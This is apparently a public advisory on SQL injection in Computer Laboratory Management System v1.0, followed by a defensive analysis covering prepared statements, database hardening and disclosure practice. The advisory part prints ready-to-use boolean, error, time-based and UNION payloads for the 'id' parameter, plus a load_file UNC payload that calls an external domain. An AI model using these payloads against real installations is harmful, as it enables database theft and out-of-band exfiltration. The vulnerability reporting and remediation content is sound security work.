Computer Laboratory Management System v1.0 - Multiple-SQLi

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: WebApps Language: SQL Published Date: 2024-04-03 
# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi
# Author: nu11secur1ty
# Date: 03/28/2024
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400
# Reference: https://portswigger.net/web-security/sql-injection

# Description:
The id parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'
was submitted in the id parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. The attacker can get all information from the system by
using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
    Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN
(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: page=user/manage_user&id=7''' AND (SELECT 1734
FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT
(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM
(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: page=user/manage_user&id=-2854' UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#
---


Computer Laboratory Management System v1.0 — Multiple SQL Injection: Analysis, Impact, and Remediation

Summary

The Computer Laboratory Management System v1.0 contains multiple SQL injection (SQLi) vulnerabilities in a user-facing parameter (reported as the id parameter). Tests indicate the application is susceptible to boolean-based, error-based, time-based, and UNION-based SQL injection techniques. The vulnerability allows attackers to query the database, read sensitive data, and in some cases interact with the underlying file system or external hosts if database functions (e.g., file-reading functions) are available and permissions are misconfigured.

Why this matters

  • SQL injection is a high-risk vulnerability that can lead to unauthorized data disclosure, user impersonation, full database compromise, or remote code execution in certain configurations.
  • Multi-vector SQLi (multiple injection types working against the same parameter) increases the probability of successful exploitation across environments and MySQL versions.
  • Misconfigured database privileges and file-access functions (such as load_file) can enable data exfiltration beyond the database, including reading files on the host system or initiating outbound requests.

Technical background: how SQL injection works (concise)

SQL injection occurs when untrusted input is used to build SQL queries without proper sanitization or use of parameterized statements. Attackers craft input that changes the intended SQL command structure, allowing them to inject additional SQL logic. The main SQLi classes relevant here are:

  • Boolean-based blind: Observes application behavior differences for true/false database conditions.
  • Error-based: Forces database errors to return information to the application, revealing schema or data.
  • Time-based blind: Uses deliberate database delays to infer true/false conditions when errors or output are not visible.
  • UNION-based: Combines attacker-controlled SELECT results with the original query to extract data directly into the application's output.

Observed vectors and implications (high level)

During assessment, the affected parameter returned behavior consistent with multiple SQLi techniques. This implies:

  • Multiple query contexts in the application are not safely parameterized (e.g., WHERE, ORDER BY, HAVING, or direct concatenation into SELECT statements).
  • The database user likely has sufficient privileges to read from INFORMATION_SCHEMA and possibly use file-access functions.
  • Successful exploitation could expose user credentials, application configuration, or other sensitive records.

Safe detection and testing guidance

When testing for SQL injection, follow an ethical and non-destructive approach:

  • Obtain explicit permission (written) before testing.
  • Prefer code review or use of a staging copy of the application and database with scrubbed/obfuscated data.
  • Use non-invasive probes (e.g., boolean checks) and avoid payloads that trigger heavy load, destructive behavior, or external network interactions.
  • Use automated scanners as an initial step, then confirm findings manually with safe, minimal-impact tests.

Vulnerable pattern (example)

<?php
// Vulnerable: direct interpolation of user input into SQL
$id = $_GET['id'];
$sql = "SELECT * FROM users WHERE id = $id";
$result = mysqli_query($conn, $sql);
?>

Explanation: This code concatenates untrusted input ($id) directly into an SQL statement. If $id is not strictly validated or cast, an attacker can inject SQL syntax to modify the query.

Secure alternatives: prepared statements and parameterization

<?php
// Secure: using PDO with prepared statements and bound parameters
$id = $_GET['id'];

$pdo = new PDO('mysql:host=localhost;dbname=labdb', 'user', 'pass', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION
]);

$stmt = $pdo->prepare('SELECT * FROM users WHERE id = :id');
$stmt->bindValue(':id', $id, PDO::PARAM_INT); // cast/validate as needed
$stmt->execute();
$user = $stmt->fetch(PDO::FETCH_ASSOC);
?>

Explanation: Prepared statements separate SQL code from data. The database treats bound values as data only, preventing them from altering the query structure. Use explicit parameter types (e.g., PDO::PARAM_INT) when possible and validate input at the application level.

Other secure coding examples and mitigations

  • Use higher-level data access libraries or ORMs that internally use parameterized queries.
  • Whitelisting: For parameters used in identifiers (e.g., column names or ORDER BY), use strict whitelists and map user input to allowed values rather than interpolating directly.
  • Stored procedures: When used correctly, they can reduce risk, but must still use parameters and avoid dynamic SQL built from concatenated inputs.

Database and server hardening

Reducing the database attack surface complements secure code:

AreaRecommendation
Database privilegesGrant the application account the minimum privileges. Avoid FILE or SUPER privileges unless strictly necessary.
File functionsRestrict or disable file-reading functions if not needed (e.g., disable LOAD_FILE access, configure secure_file_priv to a narrow directory).
Local infileDisable local infile (local_infile=0) if not required to prevent arbitrary file uploads/downloads via SQL commands.
Network accessRestrict outbound network access from the DB host and application servers to limit exfiltration paths.
AuditingEnable query and privilege audit trails to detect suspicious activity and repeated injection attempts.

Monitoring, detection, and response

  • Implement Web Application Firewall (WAF) rules that detect common SQLi patterns as a compensating control while fixing root causes.
  • Instrument application logs to capture full request context with parameter values (obfuscated for PII) and correlate with DB logs.
  • Set up alerts for anomalous queries (e.g., queries against INFORMATION_SCHEMA, LOAD_FILE usage, or large numbers of UNIONs) and rapid failed attempts.

Secure development lifecycle recommendations

  • Integrate static analysis and dynamic application security testing (DAST) into CI/CD pipelines.
  • Perform regular code reviews focused on data access and query construction patterns.
  • Use unit and integration tests that assert proper parameterization and input validation for critical paths.

Incident handling and responsible disclosure

If you discover SQLi in a production system:

  • Stop further intrusive tests that could exfiltrate or modify data.
  • Document how the issue was found, what inputs were used (without including exploit payloads), and provide reproducible but non-destructive proof-of-concept steps if requested by the vendor.
  • Contact the vendor/maintainer with a timeline and remediation recommendations; coordinate disclosure to avoid public exposure before fixes are in place.

Further reading and resources

  • OWASP: SQL Injection Prevention Cheat Sheet — practical patterns and examples for parameterized queries and input validation.
  • Database vendor docs: MySQL security and configuration options (secure_file_priv, local_infile).
  • Application security literature: principles of least privilege, secure coding, and testing practices for web applications.

Summary of recommended actions (quick checklist)

  • Replace all dynamic SQL concatenation with parameterized queries or prepared statements.
  • Validate and cast user input; use whitelists for identifiers.
  • Harden DB configuration: revoke unnecessary privileges, restrict file access, and disable local infile if not needed.
  • Use WAF/IDS as an interim control and add logging/alerting for suspicious DB activity.
  • Perform code review and re-test in a safe environment; coordinate responsible disclosure and patch deployment.